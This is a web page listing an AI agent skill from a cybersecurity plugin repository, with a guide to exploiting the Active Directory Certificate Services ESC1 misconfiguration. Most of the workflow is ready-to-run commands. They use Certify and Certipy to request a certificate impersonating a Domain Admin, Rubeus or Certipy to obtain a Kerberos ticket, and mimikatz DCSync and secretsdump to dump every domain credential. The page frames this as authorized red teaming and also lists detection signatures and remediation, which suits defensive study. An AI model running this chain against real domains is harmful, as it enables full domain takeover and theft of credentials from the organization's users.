Skill

exploiting-active-directory-certificate-services-esc1

Exploits AD CS ESC1 misconfigurations to request certificates impersonating Domain Admins and escalate domain privileges in authorized red team assessments.

Python

Powershell

security

npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

Supporting Assets

LICENSEassets/template.mdreferences/api-reference.mdreferences/standards.mdreferences/workflows.mdscripts/agent.pyscripts/process.py

SKILL.md

Similar Skills

applying-brand-guidelines

41.6k

Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.

3 files

anthropics-claude-cookbooks

creating-financial-models

41.6k

Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.

2 files

anthropics-claude-cookbooks

analyzing-financial-statements

41.6k

Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.

2 files

anthropics-claude-cookbooks

Stats

Stars5748

Forks783

Last CommitApr 6, 2026

Actions

View Source View Plugin View on GitHub View README

Exploiting Active Directory Certificate Services ESC1

Overview

ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Key Usage (EKU) that permits client authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose). This allows an attacker to specify an arbitrary Subject Alternative Name (SAN) in the certificate request, effectively impersonating any domain user. ESC1 was documented by SpecterOps researchers Will Schroeder and Lee Christensen in their "Certified Pre-Owned" whitepaper (2021) and remains one of the most common AD CS attack paths. The MITRE ATT&CK framework tracks this as T1649 (Steal or Forge Authentication Certificates).

When to Use

When performing authorized security testing that involves exploiting active directory certificate services esc1
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding

Prerequisites

Familiarity with red teaming concepts and tools
Access to a test or lab environment for safe execution
Python 3.8+ with required dependencies installed
Appropriate authorization for any testing activities

Objectives

Enumerate AD CS infrastructure and certificate templates using Certify or Certipy
Identify vulnerable ESC1 templates with "Supply in Request" enabled
Request a certificate specifying a Domain Admin in the SAN field
Authenticate using the forged certificate via PKINIT to obtain a TGT
Escalate privileges to Domain Admin using the obtained Kerberos ticket
Document the full attack chain for the engagement report

MITRE ATT&CK Mapping

T1649 - Steal or Forge Authentication Certificates
T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
T1078.002 - Valid Accounts: Domain Accounts
T1484 - Domain Policy Modification
T1087.002 - Account Discovery: Domain Account

Workflow

Phase 1: AD CS Enumeration

Enumerate Certificate Authority (CA) servers in the domain:

# Using Certify (Windows)
Certify.exe cas

# Using Certipy (Linux/Python)
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1

Enumerate all certificate templates and identify vulnerable ones:

# Using Certify - find vulnerable templates
Certify.exe find /vulnerable

# Using Certipy - outputs JSON and text reports
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1 -vulnerable

Verify ESC1 conditions on identified templates:
- msPKI-Certificate-Name-Flag contains ENROLLEE_SUPPLIES_SUBJECT
- pkiExtendedKeyUsage contains Client Authentication or Smart Card Logon
- msPKI-Enrollment-Flag does not require manager approval
- Low-privileged group (Domain Users, Authenticated Users) has Enroll rights

Phase 2: Certificate Request with Arbitrary SAN

Request a certificate using the vulnerable template, specifying a Domain Admin in the SAN:

# Using Certify (Windows)
Certify.exe request /ca:DC01.domain.local\domain-CA /template:VulnerableTemplate /altname:administrator

# Using Certipy (Linux)
certipy req -u user@domain.local -p 'Password123' -ca 'domain-CA' -target DC01.domain.local -template VulnerableTemplate -upn administrator@domain.local

The CA issues a certificate with the Domain Admin's UPN in the SAN field
Save the output certificate in PFX/PEM format

Phase 3: Authentication with Forged Certificate

Convert the certificate if needed (Certify outputs PEM, convert to PFX):

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Authenticate using PKINIT to obtain a TGT for the impersonated user:

# Using Rubeus (Windows)
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:<pfx-password> /ptt

# Using Certipy (Linux)
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

The TGT is now loaded in memory (Windows) or the NT hash is recovered (Linux)

Phase 4: Domain Privilege Escalation

With the Domain Admin TGT, perform privileged operations:

# DCSync to dump all domain credentials
mimikatz.exe "lsadump::dcsync /domain:domain.local /all"

# Or using secretsdump.py with the obtained NT hash
secretsdump.py domain.local/administrator@DC01.domain.local -hashes :ntlmhash

Validate Domain Admin access:

# List domain controllers
dir \\DC01.domain.local\C$

# Access Domain Admin shares
dir \\DC01.domain.local\SYSVOL

Tools and Resources

Tool	Purpose	Platform
Certify	AD CS enumeration and certificate requests	Windows (.NET)
Certipy	AD CS enumeration, request, and authentication	Linux (Python)
Rubeus	Kerberos authentication with certificates (PKINIT)	Windows (.NET)
Mimikatz	Credential dumping post-escalation	Windows
secretsdump.py	Remote credential dumping (Impacket)	Linux (Python)
PSPKIAudit	PowerShell AD CS auditing module	Windows
ForgeCert	Certificate forgery tool	Windows (.NET)

Vulnerable Template Indicators

Condition	Vulnerable Value
msPKI-Certificate-Name-Flag	ENROLLEE_SUPPLIES_SUBJECT (1)
pkiExtendedKeyUsage	Client Authentication (1.3.6.1.5.5.7.3.2)
Enrollment Rights	Domain Users or Authenticated Users
msPKI-Enrollment-Flag	No manager approval required
CA Setting	No approval workflow enforced

Detection Signatures

Indicator	Detection Method
Certificate request with SAN different from requester	Windows Event 4886 / 4887 on CA server
Unusual PKINIT authentication	Event 4768 with certificate-based pre-auth
Certify.exe or Certipy execution	EDR process monitoring and command-line logging
Mass certificate template enumeration	LDAP query monitoring for pkiCertificateTemplate objects
Certificate issued to non-matching UPN	CA audit logs and certificate transparency

Validation Criteria

AD CS Certificate Authority enumerated
Vulnerable ESC1 templates identified with Certify or Certipy
Certificate requested with Domain Admin SAN successfully
PKINIT authentication performed with forged certificate
Domain Admin TGT obtained
Privileged access to domain controller validated
Full attack chain documented with evidence
Remediation recommendations provided (disable Supply in Request, require manager approval)